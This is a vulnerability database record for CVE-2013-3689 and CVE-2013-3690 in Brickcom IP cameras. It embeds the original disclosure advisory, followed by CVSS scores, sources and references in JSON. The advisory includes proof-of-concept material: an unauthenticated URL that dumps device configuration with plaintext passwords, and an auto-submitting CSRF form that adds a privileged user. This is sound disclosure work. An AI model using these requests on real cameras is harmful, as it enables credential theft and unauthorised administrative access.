var-201310-0207
Vulnerability from variot
Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.0.6.16C1 and earlier, do not properly restrict access to configfile.dump, which allow remote attackers to obtain sensitive information (user names, passwords, and configurations) via a get action. Brickcom IP Cameras are IP camera devices. Multiple Brickcom IP Cameras devices have security vulnerabilities that allow remote attackers to exploit vulnerabilities without having to verify direct commit requests for profile information. Brickcom multiple IP cameras including FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, and OSD-040E are prone to an information-disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Brickcom FB-100Ap and so on are network camera products of Brickcom. The vulnerability is caused by the program not properly restricting access to the configfile.dump file. The following network camera models are affected: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E. ============================================================================ BRICKCOM ==================================================================== ============================================================================
1.Advisory Information Title: Brickcom 100ap Series Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013
2.Vulnerability Description Multiples vulnerabilities have been found in this device. -CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312) -CVE-2013-3690. Cross Site Request Forgery(CWE-352), Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250)
3.Affected Products The following products are affected by these vulnerabilities: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E It\x92s possible others models are affected but they were not checked. -CVE-2013-3689. We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1 In the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain text yet: firmwareVersion=v3.1.0.8,v3.1.0.4 -CVE-2013-3690. All firmware checked.
4.PoC 4.1.Authentication Bypass & Clear Text Storage of Sensitive Information CVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). It\x92s not necessary any authentication.
http://xx.xx.xx.xx/configfile.dump?action=get
The most interesting parameters could be: UserSetSetting.userList.users[n\xba].password= *** UserSetSetting.userList.users[n\xba].name= ***
4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation CVE-2013-3690, CSRF is possible via POST method. Also is possible a privilege escalation from a viewer user to an administrator user. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. The following request can exploit this vulnerability
document.gobap.submit();5.Credits -CVE-2013-3689 was discovered by Eliezer Varad\xe9 Lopez, Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo. -CVE-2013-3690 was discovered by Jon\xe1s Ropero Castillo.
6.Report Timeline -2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities. -2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct. (CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it\x92s looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one) -2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities. -2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201310-0207", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "osd-040e", "scope": null, "trust": 1.4, "vendor": "brickcom", "version": null }, { "model": "ob-100ae", "scope": null, "trust": 1.4, "vendor": "brickcom", "version": null }, { "model": "wfb-100ap", "scope": null, "trust": 1.4, "vendor": "brickcom", "version": null }, { "model": "md-100ap", "scope": null, "trust": 1.4, "vendor": "brickcom", "version": null }, { "model": "wcb-100ap", "scope": null, "trust": 1.4, "vendor": "brickcom", "version": null }, { "model": "fb-100ap", "scope": null, "trust": 1.4, "vendor": "brickcom", "version": null }, { "model": "md-100ap", "scope": "eq", "trust": 1.0, "vendor": "brickom", "version": null }, { "model": "wfb-100ap", "scope": "eq", "trust": 1.0, "vendor": "brickom", "version": null }, { "model": "100ap device", "scope": "lte", "trust": 1.0, "vendor": "brickom", "version": "3.0.6.16c1" }, { "model": "osd-040e", "scope": "eq", "trust": 1.0, "vendor": "brickom", "version": null }, { "model": "wcb-100ap", "scope": "eq", "trust": 1.0, "vendor": "brickom", "version": null }, { "model": "ob-100ae", "scope": "eq", "trust": 1.0, "vendor": "brickom", "version": null }, { "model": "fb-100ap", "scope": "eq", "trust": 1.0, "vendor": "brickom", "version": null }, { "model": "100-ap series", "scope": "lte", "trust": 0.8, "vendor": "brickcom", "version": "3.0.6.16c1" }, { "model": "100ap device", "scope": "eq", "trust": 0.6, "vendor": "brickom", "version": "3.0.6.16c1" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-07706" }, { "db": "JVNDB", "id": "JVNDB-2013-004513" }, { "db": "CNNVD", "id": "CNNVD-201306-264" }, { "db": "NVD", "id": "CVE-2013-3689" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:brickom:100ap_device_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/h:brickom:fb-100ap", "vulnerable": true }, { "cpe22Uri": "cpe:/h:brickom:md-100ap", "vulnerable": true }, { "cpe22Uri": "cpe:/h:brickom:ob-100ae", "vulnerable": true }, { "cpe22Uri": "cpe:/h:brickom:osd-040e", "vulnerable": true }, { "cpe22Uri": "cpe:/h:brickom:wcb-100ap", "vulnerable": true }, { "cpe22Uri": "cpe:/h:brickom:wfb-100ap", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-004513" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Eliezer Varad Lopez, Javier Repiso Snchez and Jons Ropero Castillo.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201306-264" } ], "trust": 0.6 }, "cve": "CVE-2013-3689", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2013-3689", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2013-07706", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-63691", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-3689", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2013-3689", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2013-07706", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201306-264", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-63691", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-07706" }, { "db": "VULHUB", "id": "VHN-63691" }, { "db": "JVNDB", "id": "JVNDB-2013-004513" }, { "db": "CNNVD", "id": "CNNVD-201306-264" }, { "db": "NVD", "id": "CVE-2013-3689" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.0.6.16C1 and earlier, do not properly restrict access to configfile.dump, which allow remote attackers to obtain sensitive information (user names, passwords, and configurations) via a get action. Brickcom IP Cameras are IP camera devices. Multiple Brickcom IP Cameras devices have security vulnerabilities that allow remote attackers to exploit vulnerabilities without having to verify direct commit requests for profile information. Brickcom multiple IP cameras including FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, and OSD-040E are prone to an information-disclosure vulnerability. \nSuccessful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Brickcom FB-100Ap and so on are network camera products of Brickcom. The vulnerability is caused by the program not properly restricting access to the configfile.dump file. The following network camera models are affected: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E. ============================================================================\nBRICKCOM\n====================================================================\n============================================================================\n\n1.Advisory Information\nTitle: Brickcom 100ap Series Vulnerabilities\nDate Published: 12/06/2013\nDate of last updated: 12/06/2013\n\n2.Vulnerability Description\nMultiples vulnerabilities have been found in this device. \n-CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312)\n-CVE-2013-3690. Cross Site Request Forgery(CWE-352), Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250)\n\n3.Affected Products\nThe following products are affected by these vulnerabilities:\nFB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E\nIt\\x92s possible others models are affected but they were not checked. \n-CVE-2013-3689. \nWe have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1\nIn the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain text yet: firmwareVersion=v3.1.0.8,v3.1.0.4\n-CVE-2013-3690. \nAll firmware checked. \n\n4.PoC\n4.1.Authentication Bypass \u0026 Clear Text Storage of Sensitive Information\nCVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). It\\x92s not necessary any authentication. \n_____________________________________________________________________________\nhttp://xx.xx.xx.xx/configfile.dump?action=get\n_____________________________________________________________________________\n\nThe most interesting parameters could be:\nUserSetSetting.userList.users[n\\xba].password= ***\nUserSetSetting.userList.users[n\\xba].name= ***\n\n4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation\nCVE-2013-3690, CSRF is possible via POST method. \nAlso is possible a privilege escalation from a viewer user to an administrator user. \nA malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. \nThe following request can exploit this vulnerability\n_____________________________________________________________________________\n\u003chtml\u003e\n\u003cbody\u003e\n \u003cform name=\"gobap\" action=\"http://xx.xx.xx.xx/cgi-bin/users.cgi\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"action\" value=\"add\"\u003e\n \u003cinput type=\"hidden\" name=\"index\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\"test2\"\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"test2\"\u003e\n \u003cinput type=\"hidden\" name=\"privilege\" value=\"1\"\u003e\n \u003cscript\u003edocument.gobap.submit();\u003c/script\u003e\n \u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n_____________________________________________________________________________\n\n5.Credits\n-CVE-2013-3689 was discovered by Eliezer Varad\\xe9 Lopez, Javier Repiso S\\xe1nchez and Jon\\xe1s Ropero Castillo. \n-CVE-2013-3690 was discovered by Jon\\xe1s Ropero Castillo. \n\n6.Report Timeline\n-2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities. \n-2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct. \n(CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it\\x92s looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one)\n-2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities. \n-2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible", "sources": [ { "db": "NVD", "id": "CVE-2013-3689" }, { "db": "JVNDB", "id": "JVNDB-2013-004513" }, { "db": "CNVD", "id": "CNVD-2013-07706" }, { "db": "BID", "id": "60525" }, { "db": "VULHUB", "id": "VHN-63691" }, { "db": "PACKETSTORM", "id": "122003" } ], "trust": 2.61 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-63691", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-63691" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-3689", "trust": 3.5 }, { "db": "BID", "id": "60525", "trust": 1.6 }, { "db": "JVNDB", "id": "JVNDB-2013-004513", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201306-264", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2013-07706", "trust": 0.6 }, { "db": "FULLDISC", "id": "20130612 SECURITY ANALYSIS OF IP VIDEO SURVEILLANCE CAMERAS", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "122003", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-63691", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-07706" }, { "db": "VULHUB", "id": "VHN-63691" }, { "db": "BID", "id": "60525" }, { "db": "JVNDB", "id": "JVNDB-2013-004513" }, { "db": "PACKETSTORM", "id": "122003" }, { "db": "CNNVD", "id": "CNNVD-201306-264" }, { "db": "NVD", "id": "CVE-2013-3689" } ] }, "id": "VAR-201310-0207", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2013-07706" }, { "db": "VULHUB", "id": "VHN-63691" } ], "trust": 1.3666667 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-07706" } ] }, "last_update_date": "2024-11-23T21:16:43.910000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "http://www.brickcom.com/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-004513" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-264", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-63691" }, { "db": "JVNDB", "id": "JVNDB-2013-004513" }, { "db": "NVD", "id": "CVE-2013-3689" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "http://seclists.org/fulldisclosure/2013/jun/84" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3689" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-3689" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/60525" }, { "trust": 0.1, "url": "http://xx.xx.xx.xx/configfile.dump?action=get" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3690" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3689" }, { "trust": 0.1, "url": "http://xx.xx.xx.xx/cgi-bin/users.cgi\"" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-07706" }, { "db": "VULHUB", "id": "VHN-63691" }, { "db": "JVNDB", "id": "JVNDB-2013-004513" }, { "db": "PACKETSTORM", "id": "122003" }, { "db": "CNNVD", "id": "CNNVD-201306-264" }, { "db": "NVD", "id": "CVE-2013-3689" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2013-07706" }, { "db": "VULHUB", "id": "VHN-63691" }, { "db": "BID", "id": "60525" }, { "db": "JVNDB", "id": "JVNDB-2013-004513" }, { "db": "PACKETSTORM", "id": "122003" }, { "db": "CNNVD", "id": "CNNVD-201306-264" }, { "db": "NVD", "id": "CVE-2013-3689" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-06-20T00:00:00", "db": "CNVD", "id": "CNVD-2013-07706" }, { "date": "2013-10-04T00:00:00", "db": "VULHUB", "id": "VHN-63691" }, { "date": "2013-06-13T00:00:00", "db": "BID", "id": "60525" }, { "date": "2013-10-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-004513" }, { "date": "2013-06-13T06:08:04", "db": "PACKETSTORM", "id": "122003" }, { "date": "2013-06-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201306-264" }, { "date": "2013-10-04T23:55:03.970000", "db": "NVD", "id": "CVE-2013-3689" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-08-28T00:00:00", "db": "CNVD", "id": "CNVD-2013-07706" }, { "date": "2013-10-07T00:00:00", "db": "VULHUB", "id": "VHN-63691" }, { "date": "2013-06-13T00:00:00", "db": "BID", "id": "60525" }, { "date": "2013-10-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-004513" }, { "date": "2013-10-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201306-264" }, { "date": "2024-11-21T01:54:07.927000", "db": "NVD", "id": "CVE-2013-3689" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201306-264" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Brickcom Multiple IP Cameras Information Disclosure Vulnerability", "sources": [ { "db": "CNVD", "id": "CNVD-2013-07706" }, { "db": "CNNVD", "id": "CNNVD-201306-264" } ], "trust": 1.2 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "permissions and access control", "sources": [ { "db": "CNNVD", "id": "CNNVD-201306-264" } ], "trust": 0.6 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.